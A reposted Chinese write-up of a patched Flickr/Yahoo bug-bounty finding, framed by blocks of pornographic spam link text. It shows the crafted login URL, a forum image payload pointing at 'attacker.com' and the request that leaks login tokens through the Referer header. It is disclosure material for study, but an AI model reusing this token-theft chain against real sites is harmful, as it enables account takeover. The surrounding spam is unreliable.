日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

价值7k美刀的Flickr网站漏洞是怎么样的?

發(fā)布時間:2023/12/18 编程问答 35 豆豆
生活随笔 收集整理的這篇文章主要介紹了 价值7k美刀的Flickr网站漏洞是怎么样的? 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
本文講的是價值7k美刀的Flickr網(wǎng)站漏洞是怎么樣的?,Flickr是雅虎旗下圖片分享網(wǎng)站,Reizelman發(fā)現(xiàn)該網(wǎng)站存在三個漏洞,三個漏洞相互配合使用,可以接管他人Flickr帳戶。

Flickr.com登錄流程概述 ? ?

Reizelman發(fā)現(xiàn)每次用戶登錄Flickr.com網(wǎng)站時,都會被重定向到login.yahoo.com域用于身份驗證。 ? ?

https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c=H6T9XcS72e4mRnW3NpTAiU8ZkA–&.intl=il&.lang=en&mg=1&.done=https://login.yahoo.com/config/validate?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c=JvVF95K62e6PzdPu7MBv2V8-&.intl=il&.done =https://www.flickr.com/signin/yahoo/?redir=https://www.flickr.com/null ?

以上網(wǎng)址是Yahoo帳戶登錄頁面,用戶被提示輸入他的賬戶密碼。輸入賬戶密碼并單擊登錄后,如果賬戶密碼有效,則將其重定向到以下Flickr url:

??https://www.flickr.com/signin/yahoo/?redir=https%3A%2F%2Fwww.flickr.com%2F&.data={first-token-value}&.ys={second-token-value }

Reizelman通過觀察,如果用戶已經(jīng)登錄到Y(jié)ahoo,再點擊登錄鏈接:

https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c=H6T9XcS72e4mRnW3NpTAiU8ZkA–&.intl=il&.lang=en&mg=1&.done=https://login.yahoo.com/config/validate?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c=JvVF95K62e6PzdPu7MBv2V8-&.intl=il&.done =https://www.flickr.com/signin/yahoo/?redir=https://www.flickr.com/?

驗證的流程發(fā)生在后臺,用戶不需要在Yahoo域輸入他的賬戶密碼,即可完成flickr網(wǎng)站登錄認證。?

這種的驗證方式可能引發(fā)其他用戶的賬戶被黑客接管,因為用戶只需點擊單個鏈接(如在某些OAuth實現(xiàn)中)來進行身份驗證,這樣他就可以進行身份驗證。熟悉了登錄的流程,進行尋找是否有會被他人賬戶被黑客接管的風(fēng)險。?

通過以上的url我發(fā)現(xiàn),我可以控制.done這個參數(shù),該參數(shù)控制了登錄token的發(fā)送位置,看起來雅虎只驗證https://www.flickr.com/signin/yahoo/這種開頭的域,但是我們?nèi)匀豢梢愿郊?./所以如果我們將../../test附加到.done參數(shù) .ys及.data的Token將被發(fā)送到https://www.flickr.com/test頁面。?

這給了我一個引導(dǎo),假如我在ww.flickr.com找到一個重定向,我就可以把Token發(fā)送到我控制的服務(wù)器,但是無法在www.flickr.com主域找到一個重定向漏洞,所以我尋找其他的辦法。

經(jīng)過一番查找,我找到了這個頁面:https://www.flickr.com/html.gne?tighten=0&type=comment,可以在Flickr評論頁面中插入圖片。我覺得也許可以在評論插入一個外鏈圖片,Toeken將通過referer字段發(fā)送到我控制的機器上,我發(fā)表了一個評論插入了圖片。

??????/img?src=“https://attacker.com/someimage.jpg”/

該圖像確實插入在評論中了,但是src值成如下連接:

https://ec.yimg.com/ec?url=https://attacker.com/someimage.jpg&t=1491136241&sig=FGQiNHDOtEj7LQDBbYBnwA-~C

這實際是雅虎的代理,把用戶上傳圖片,自己保存,通過代理的方式來加載顯示,不去請求外部的服務(wù)器。但是,如果我使用一些技巧,我可以操縱Flickr圖像處理邏輯。發(fā)布了以下評論:

??/img?src=“//www.attacker.com/someimage.jpg”/

該注釋未被代理操作,并且src保持原樣,按理說圖片會顯示在評論中,但是,有遇到一個問題了,網(wǎng)站使用了Content-Security-Policy(CSP),img-src屬性定義了,只能從以下的網(wǎng)站加載圖片。因為我們插入圖片的網(wǎng)址不是白名單內(nèi)的,是無法加載的。

Content-Security-Policy:img-src?data:?blob:? https://*.flickr.com? https://*.flickr.net? http://*.flickr.net? https://*.staticflickr.com? http://*.staticflickr.com? https://*.yimg.com? https://*.yahoo.com? https://*.cedexis.com? https://*.cedexis-test.com? https://*.cedexis-radar.net? https://sb.scorecardresearch.com? https://image.maps.api.here.com? https://csync.yahooapis.com? https://*.paypal.com? https://*.pinterest.com? http://*.static-alpha.flickr.com? https://geo-um.btrll.com? https://connect.facebook.net? https://*.facebook.com? https://bs.serving-sys.com? https://*.adserver.yahoo.com? https://*.maps.api.here.com? https://*.maps.cit.api.here.com? https://*.ads.yahoo.com? https://secure.footprint.net

知道這一點后,我嘗試在其他頁面尋找可評論的地方,過了一段時間,找到了一個論壇頁面,www.flickr.com/help/forum/en-us/。這個頁面支持HTML代碼插入功能的評論,更爽的是https://www.flickr.com/help/forum/*這個網(wǎng)站都沒用使用CSP。

所以我在論壇發(fā)布了以下評論: ?/?img?src?=“?/??/?www.attacker.com/someimage.jpg”/

一個外部的圖片被插入到這里:

https://www.flickr.com/help/forum/en-us/72157668446997150/page14/

所以我現(xiàn)在要做的就是構(gòu)造最終的url,如下:

https://login.yahoo.com/config/validate?.src=flickrsignin&.pc=8190&.scrumb=cLI6NPLejY6&.scrumb2=GszxN7PzUWX&.pd=c%3DJvVF95K62e6PzdPu7MBv2V8-&.intl=il&.done=https://www.flickr.com/signin/yahoo/../?../help/forum/en-us/72157668446997150/page14/

當(dāng)用戶點擊鏈接時他被重定向到https://www.flickr.com/help/forum/en-us/72157668446997150/page14?data={some-token}&.ys={second -token},在這個請求中,他向瀏覽器發(fā)出來了如下的請求。

GET?https://www.attacker.com/someimage.jpg?HTTP/1.1Host:?www.attacker.comConnection:?keep-aliveUser-Agent:?Mozilla/5.0?(Windows?NT?10.0;?Win64;?x64)?AppleWebKit/537.36?(KHTML,?like?Gecko)?Chrome/56.0.2924.87????Safari/537.36Accept:?image/webp,image/*,*/*;q=0.8Referer:?https://www.flickr.com/help/forum/en-us/72157668446997150/page14/?.data={some-token}&.ys={second-token}?Accept-Encoding:?gzip,?deflate,?sdch,?brAccept-Language:?he-IL,he;q=0.8,en-US;q=0.6,en;q=0.4,es;q=0.

可以看到Referer字段的含有.data={some-token}&.ys={second-token},將要發(fā)送到指定的網(wǎng)址,而這個網(wǎng)站是我們控制的,可以拿到Rerferer信息。

攻擊者通過referer拿到token之后,構(gòu)造攻擊url,如下

https://www.flickr.com/signin/yahoo/?.data={copied?from?refferer}&。ys?=?{replied?referer

即可登錄到受害者的賬戶。

修復(fù)

雅虎通過以下的辦法來解決這個漏洞。

1. login.yahoo.com端點上的.done參數(shù)僅允許https://www.flickr.com/signin/yahoo/作為有效值。

2.使用“/ ?/ ”的插入的圖片也是固定的。

3.現(xiàn)在CSP應(yīng)用于Flickr論壇。

修復(fù)時間線

2017年4月2日 – ?通過Hackerone的初步報告

2017年4月3日 – ?報告舉報

2017年4月10日 – 報告已解決

2017年4月21日 – 7K $獎賞獎勵




原文發(fā)布時間為:2017年5月4日 本文作者:愣娃 本文來自云棲社區(qū)合作伙伴嘶吼,了解相關(guān)信息可以關(guān)注嘶吼網(wǎng)站。 原文鏈接

總結(jié)

以上是生活随笔為你收集整理的价值7k美刀的Flickr网站漏洞是怎么样的?的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 草逼导航| 东京热毛片 | 国产亚洲女人久久久久毛片 | 打屁股疼的撕心裂肺的视频 | 天天操夜夜操夜夜操 | 激情偷乱人成视频在线观看 | 精品福利一区二区三区 | 欧美mv日韩mv国产网站app | 香蕉视频亚洲一级 | 探花视频在线版播放免费观看 | 日韩午夜小视频 | 91在线短视频 | 嫩草国产在线 | 97青草 | 人人爱av| 亚洲第8页| 中国女人真人一级毛片 | www.久久精品.com | 丁香婷婷激情五月 | 亚洲精品国产精品国自产观看浪潮 | 人妻丰满熟妇av无码久久洗澡 | 九九热在线精品视频 | 中文字幕人妻一区二区三区视频 | 欧美少妇诱惑 | 欧美激情电影一区二区 | 又紧又大又爽精品一区二区 | 污视频大全 | 尤物视频免费在线观看 | 91亚洲国产成人久久精品麻豆 | 国产精品第5页 | 欧美久久久久久久久久久久 | 天天摸天天舔天天操 | 久在线播放 | 亚洲天天看 | 国产区欧美区日韩区 | 在线综合网 | 日韩精品激情 | 国产精品久久久久久久专区 | 国产视频你懂得 | 朝鲜一级黄色片 | 日韩成人av网站 | 国产成人精品综合久久久久99 | 麻豆av一区二区三区 | 成人性生交生交视频 | 中国在线观看片免费 | 日韩和一区二区 | 久久人人爽爽人人爽人人片av | 99资源 | 久久久久久久性 | 精品人妻伦一二三区久久 | 亚洲www久久久 | 成人av毛片| 日韩视频免费在线播放 | 亚洲在线成人 | 天堂网视频在线 | 国产黄色网址在线观看 | 在哪里看毛片 | 丁香一区二区三区 | 姑娘第5集在线观看免费 | 在线亚洲欧美 | 日韩伦理中文字幕 | 热久久精| 欧美色图网址 | 天天做天天爱夜夜爽 | 成人18视频免费69 | 蜜臀av一区二区三区 | 成人h在线观看 | 亚洲女人18毛片水真多 | 美女网站免费视频 | 91精品久久久久久久久久入口 | 日韩一区二区三区在线免费观看 | 综合网在线视频 | 鸭子av | 快射视频网站 | 性一交一乱一色一免费无遮挡 | 亚洲视频一区在线播放 | 欧美 日韩 国产 精品 | 五月婷婷,六月丁香 | 自拍偷拍999 | 国产大片黄| 无码国内精品人妻少妇蜜桃视频 | 巨胸大乳www视频免费观看 | av在线日韩 | 国产精品一级片在线观看 | 欧美性综合 | 国产黄色片在线 | 黄在线网站 | 麻豆视频二区 | 国产极品一区二区 | 色站综合 | 亚洲色图网址 | 久久国产美女视频 | 国产永久av | 成人性生交大全免 | 亚洲精品乱码久久久久久写真 | 丝袜老师扒开让我了一夜漫画 | 中文字幕第22页 | 日本91av| 毛片视频观看 |